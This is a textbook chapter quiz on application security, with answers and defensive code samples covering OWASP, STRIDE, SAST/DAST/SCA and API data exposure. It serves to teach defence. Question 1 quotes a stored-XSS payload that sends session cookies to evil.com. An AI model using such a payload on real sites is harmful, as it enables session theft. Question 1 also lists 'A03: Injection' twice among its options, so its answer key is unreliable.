Chapter 30 Quiz: Application Security

Test your knowledge of OWASP Top 10, secure SDLC, testing methodologies, threat modeling, API security, and shift-left security practices.


Questions

1. A web application allows users to submit a product review. The input is stored in the database and displayed to other users without sanitization. An attacker submits <script>document.location='https://evil.com/steal?c='+document.cookie</script>. Which OWASP Top 10 (2021) category does this represent?

  • A) A01: Broken Access Control
  • B) A03: Injection
  • C) A03: Injection (specifically XSS)
  • D) A07: Identification and Authentication Failures
Answer

B — A03: Injection

In OWASP Top 10 2021, Cross-Site Scripting (XSS) was consolidated into A03: Injection (previously it had its own category in 2017). The attack is stored XSS — malicious script is persisted in the database and executed in victims' browsers on page load, stealing session cookies. The fix is output encoding and Content Security Policy (CSP).
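The fix named above, shown as an added Python example that is not part of the quiz: the vulnerable rendering interpolates the stored review straight into HTML, the fixed rendering HTML-encodes it for an element-body context, and a Content-Security-Policy header provides a second layer if an encoding is ever missed. The review text reuses the payload pattern from the question; the function and header names are the example's own.

```python
# Added example (not from the quiz): stored XSS fixed by output encoding plus CSP.
import html
from typing import Dict

# Constructed sample review, following the payload quoted in the question.
STORED_REVIEW = (
    "<script>document.location='https://evil.com/steal?c='+document.cookie</script>"
)


def render_review_unsafe(review: str) -> str:
    """Vulnerable: stored user input is placed in the page without encoding."""
    return f'<div class="review">{review}</div>'


def render_review_safe(review: str) -> str:
    """Fixed: HTML-encode the text for an element-body context.

    html.escape turns < > & " ' into entities, so the browser renders the
    review as literal text instead of parsing a <script> element.
    """
    return f'<div class="review">{html.escape(review, quote=True)}</div>'


def csp_header() -> Dict[str, str]:
    """Defense in depth: a CSP that disallows inline script.

    Any legitimate inline scripts would need a nonce or hash added to
    script-src; this policy is a constructed baseline, not a universal one.
    """
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'"
        )
    }


def contains_raw_script_tag(markup: str) -> bool:
    """Check used by the demo: did a raw <script tag survive into the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print("unsafe:", render_review_unsafe(STORED_REVIEW))
    print("safe:  ", render_review_safe(STORED_REVIEW))
    print("header:", csp_header())
```

The encoding must match the output context: `html.escape` is correct for element bodies and quoted attributes, but a value placed inside a JavaScript string or a URL needs JavaScript or URL encoding instead.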


2. A security engineer integrates a tool into the CI/CD pipeline that analyzes source code without executing it, looking for SQL injection patterns, hardcoded credentials, and insecure function calls. Which testing methodology does this describe?

  • A) DAST — Dynamic Application Security Testing
  • B) IAST — Interactive Application Security Testing
  • C) SAST — Static Application Security Testing
  • D) SCA — Software Composition Analysis
Answer

C — SAST — Static Application Security Testing

SAST analyzes source code, bytecode, or binaries at rest (without execution) to identify security weaknesses. It is ideal for early pipeline integration (shift-left). DAST tests running applications by sending malicious inputs from the outside. IAST instruments the running application to observe behavior from within. SCA identifies vulnerable third-party library dependencies.


3. During threat modeling of a new payment microservice, the team identifies a scenario: "An attacker impersonates the payment service to the order service and intercepts transaction data." Which STRIDE category does this threat fall under?

  • A) Tampering
  • B) Repudiation
  • C) Spoofing
  • D) Information Disclosure
Answer

C — Spoofing

STRIDE categorizes threats as: Spoofing (impersonating another entity), Tampering (modifying data), Repudiation (denying actions), Information Disclosure (exposing data), Denial of Service, Elevation of Privilege. Impersonating a service to intercept communications is Spoofing. The mitigation is mutual TLS (mTLS) authentication between microservices.


4. A WAF is generating 500 false positives per day, blocking legitimate users. The security team is considering disabling the WAF. What is the better approach?

  • A) Disable the WAF — the false positive rate proves it is not working correctly
  • B) Switch to detection-only mode and never re-enable blocking
  • C) Tune the WAF rules by analyzing false positive patterns, creating exceptions for legitimate traffic, and iterating — accepting some false positives as a trade-off for protection
  • D) Replace all WAF rules with a single blanket block of all POST requests
Answer

C — Tune the WAF rules by analyzing false positive patterns, creating exceptions for legitimate traffic, and iterating — accepting some false positives as a trade-off for protection

WAF tuning is an ongoing process. The correct response to high false positives is analysis and rule refinement: identify which rules trigger on legitimate traffic, create path/parameter-specific exceptions, validate the change doesn't introduce bypass gaps, and iterate. Disabling (A) or detection-only mode (B) eliminates protection. WAF effectiveness requires investment in ongoing tuning.


5. Which OWASP API Security Top 10 category describes an API endpoint that exposes more data fields in its response than the calling application actually uses — for example, returning full user objects including hashed passwords when only the display name is needed?

  • A) API1: Broken Object Level Authorization
  • B) API3: Broken Object Property Level Authorization (Excessive Data Exposure)
  • C) API6: Unrestricted Access to Sensitive Business Flows
  • D) API8: Security Misconfiguration
Answer

B — API3: Broken Object Property Level Authorization (Excessive Data Exposure)

OWASP API3 (2023) covers scenarios where APIs return more data than the client requires, relying on the client to filter sensitive fields. This exposes sensitive properties to the client itself and to anyone able to read the response. The fix is server-side field filtering — return only the fields explicitly required by the consuming application, not full object representations.
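Server-side field filtering as an added Python example, not code from the quiz or from any particular framework: each API view declares an explicit allowlist of properties it may emit, and the serializer drops everything else, so a new sensitive column added to the database table is never exposed by default. The user record, view names, and field names are constructed for the example.

```python
# Added example (not from the quiz): allowlist-based serialization per API view.
from typing import Any, Dict, FrozenSet

# Constructed sample record as it might be loaded from the users table.
USER_RECORD: Dict[str, Any] = {
    "id": 42,
    "display_name": "alice",
    "email": "alice@example.com",
    "password_hash": "$argon2id$constructed-placeholder",
    "mfa_secret": "constructed-placeholder-secret",
    "created_at": "2024-01-01T00:00:00Z",
}

# Each view names exactly the properties it is allowed to return.
# Anything not listed (password_hash, mfa_secret, future columns) is dropped.
FIELD_ALLOWLISTS: Dict[str, FrozenSet[str]] = {
    # Shown to other users, e.g. next to a product review.
    "public": frozenset({"id", "display_name"}),
    # Shown to the account owner on their profile page.
    "self": frozenset({"id", "display_name", "email", "created_at"}),
}

SECRET_FIELDS = ("password_hash", "mfa_secret")


def serialize_user(record: Dict[str, Any], view: str) -> Dict[str, Any]:
    """Return only the fields the named view is allowed to expose."""
    if view not in FIELD_ALLOWLISTS:
        # Fail closed: an unknown view returns nothing rather than everything.
        raise ValueError(f"unknown API view: {view!r}")
    allowed = FIELD_ALLOWLISTS[view]
    return {key: value for key, value in record.items() if key in allowed}


def leaks_secret_fields(payload: Dict[str, Any]) -> bool:
    """Guard a test can run over every response shape: no secret key present."""
    return any(field in payload for field in SECRET_FIELDS)


if __name__ == "__main__":
    print("public view:", serialize_user(USER_RECORD, "public"))
    print("self view:  ", serialize_user(USER_RECORD, "self"))
```

The allowlist is the point: a denylist that strips `password_hash` still leaks the next sensitive column someone adds, whereas an allowlist only grows when a developer deliberately adds a field to a view.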


6. A development team introduces a new open-source library with a known critical CVE into the codebase. Which AppSec practice is specifically designed to catch this during the build pipeline?

  • A) SAST scanning
  • B) DAST scanning
  • C) Software Composition Analysis (SCA)
  • D) Fuzz testing
Answer

C — Software Composition Analysis (SCA)

SCA tools (e.g., Snyk, OWASP Dependency-Check, Dependabot) scan project dependency manifests (package.json, requirements.txt, pom.xml) against vulnerability databases (NVD, OSV) to identify known CVEs in third-party libraries. SAST analyzes custom code, not dependencies. DAST tests running applications. SCA is the primary defense against Log4Shell-style supply chain vulnerabilities.
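The core of what an SCA tool does in the build, as an added Python example that is not the quiz's code and not the logic of Snyk, Dependency-Check, or Dependabot: parse a pinned requirements.txt, compare each pin against an advisory feed of affected version ranges, and return a non-zero status so the CI step fails. The manifest, the package names, and the advisory identifiers are all constructed placeholders; a real tool would query NVD or OSV and handle version specifiers beyond simple `==` pins.

```python
# Added example (not from the quiz): a minimal SCA gate over a pinned manifest.
import re
from typing import Dict, List, Tuple

# Constructed manifest in requirements.txt style (package names are made up).
REQUIREMENTS_TXT = """\
# constructed sample manifest
example-lib==1.4.1   # affected by the constructed advisory below
demo-http==2.20.0    # already at the fixed version
demo-json==0.9       # no advisory at all
"""

# Constructed advisory feed: (package, affected_from, fixed_in, advisory id).
# affected_from is inclusive, fixed_in is exclusive. IDs are placeholders, not real CVEs.
ADVISORIES: List[Tuple[str, str, str, str]] = [
    ("example-lib", "1.0.0", "1.4.2", "ADV-PLACEHOLDER-0001"),
    ("demo-http", "0.0.0", "2.20.0", "ADV-PLACEHOLDER-0002"),
]

_PIN_RE = re.compile(r"([A-Za-z0-9_.-]+)==([0-9]+(?:\.[0-9]+)*)")


def parse_version(version: str) -> Tuple[int, ...]:
    """Turn '1.4.1' into (1, 4, 1) so tuples compare numerically, not lexically."""
    return tuple(int(part) for part in version.split("."))


def parse_requirements(text: str) -> Dict[str, str]:
    """Map package name -> pinned version; reject unpinned lines (they cannot be assessed)."""
    pins: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        match = _PIN_RE.fullmatch(line)
        if not match:
            raise ValueError(f"unpinned or unparsable requirement: {line!r}")
        pins[match.group(1).lower()] = match.group(2)
    return pins


def find_vulnerable(pins: Dict[str, str], advisories) -> List[Dict[str, str]]:
    """Report every pin that falls inside an advisory's affected range."""
    findings = []
    for package, affected_from, fixed_in, advisory_id in advisories:
        if package not in pins:
            continue
        installed = parse_version(pins[package])
        if parse_version(affected_from) <= installed < parse_version(fixed_in):
            findings.append({
                "package": package,
                "installed": pins[package],
                "fixed_in": fixed_in,
                "advisory": advisory_id,
            })
    return findings


def gate_build(findings: List[Dict[str, str]]) -> int:
    """Exit status for the CI step: 1 (fail) if any known-vulnerable pin exists."""
    return 1 if findings else 0


if __name__ == "__main__":
    results = find_vulnerable(parse_requirements(REQUIREMENTS_TXT), ADVISORIES)
    for finding in results:
        print(f"{finding['package']}=={finding['installed']} is affected by "
              f"{finding['advisory']}; upgrade to {finding['fixed_in']}")
    raise SystemExit(gate_build(results))
```

Because the check only runs on pinned versions, the example refuses unpinned lines; a manifest with floating ranges is exactly the case where the tool cannot say what will actually be installed in production.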


7. An organization wants to embed security knowledge within development teams rather than having all security reviews bottlenecked through a central AppSec team. Which program model achieves this?

  • A) Red team operations embedded in the SDLC
  • B) Security Champions program — developers trained in AppSec who serve as security liaisons within each team
  • C) Outsourcing all code review to a third-party security firm
  • D) Mandatory CISO approval for all code commits
Answer

B — Security Champions program — developers trained in AppSec who serve as security liaisons within each team

A Security Champions program identifies security-interested developers within each team and provides them with dedicated AppSec training, access to security tooling, and a community of practice. Champions perform first-line security reviews, advocate for secure design within their teams, and escalate to the central AppSec team for complex issues. This scales security coverage without requiring a security review for every pull request.


8. In the context of the Secure SDLC, at which phase is threat modeling most effective and cost-efficient?

  • A) During penetration testing, after the application is deployed to staging
  • B) During the Design phase, before code is written
  • C) During production deployment, as part of the change management process
  • D) During the maintenance phase, when vulnerabilities are discovered post-release
Answer

B — During the Design phase, before code is written

Threat modeling is most valuable and least costly during the Design phase because: (1) architectural flaws are cheapest to fix on a whiteboard, (2) design changes are free compared to code refactoring, and (3) security requirements identified early can be built in rather than bolted on. IBM's cost-of-a-bug research shows defects found in design cost 10–100× less to fix than those found in production.


9. A DAST tool is configured to test a REST API. Which type of vulnerability is DAST most effective at discovering that SAST typically misses?

  • A) Hardcoded API keys in source code
  • B) Use of deprecated cryptographic functions
  • C) Business logic flaws and runtime authorization failures visible only when the application executes
  • D) Missing input validation annotations in Java classes
Answer

C — Business logic flaws and runtime authorization failures visible only when the application executes

DAST tests the running application by sending crafted requests and observing responses. It can discover: IDOR (can user A access user B's data?), authentication bypass, session management issues, and server-side behavior that only manifests at runtime. SAST cannot evaluate runtime behavior, business logic, or multi-request authorization flows. DAST complements SAST by covering the runtime attack surface.


10. An organization is planning to adopt "shift-left security." Which combination of practices best exemplifies shift-left in a modern SDLC?

  • A) Annual penetration testing and quarterly code reviews
  • B) SAST and SCA in CI pipeline, mandatory threat modeling at design, security unit tests, and developer security training
  • C) WAF deployment in front of all production applications
  • D) Bug bounty program rewarding external researchers for finding vulnerabilities post-launch
Answer

B — SAST and SCA in CI pipeline, mandatory threat modeling at design, security unit tests, and developer security training

Shift-left means moving security activities earlier in the development lifecycle — towards the left of the timeline. The core practices are: SAST/SCA in every build (automated, early feedback), threat modeling at design (before code), security-focused unit/integration tests (in developer workflow), and developer training (building security knowledge at the source). Post-launch activities (WAF, bug bounty, pen testing) are necessary but represent shift-right, not shift-left.


Scoring

Score   Performance
9–10    Expert — OWASP, secure SDLC, and AppSec testing methodologies fully mastered
7–8     Proficient — Ready to lead application security programs and pipeline integration
5–6     Developing — Review Chapter 30 sections on STRIDE threat modeling, SAST/DAST/SCA differences, and OWASP Top 10
<5      Foundational — Re-read Chapter 30 before proceeding
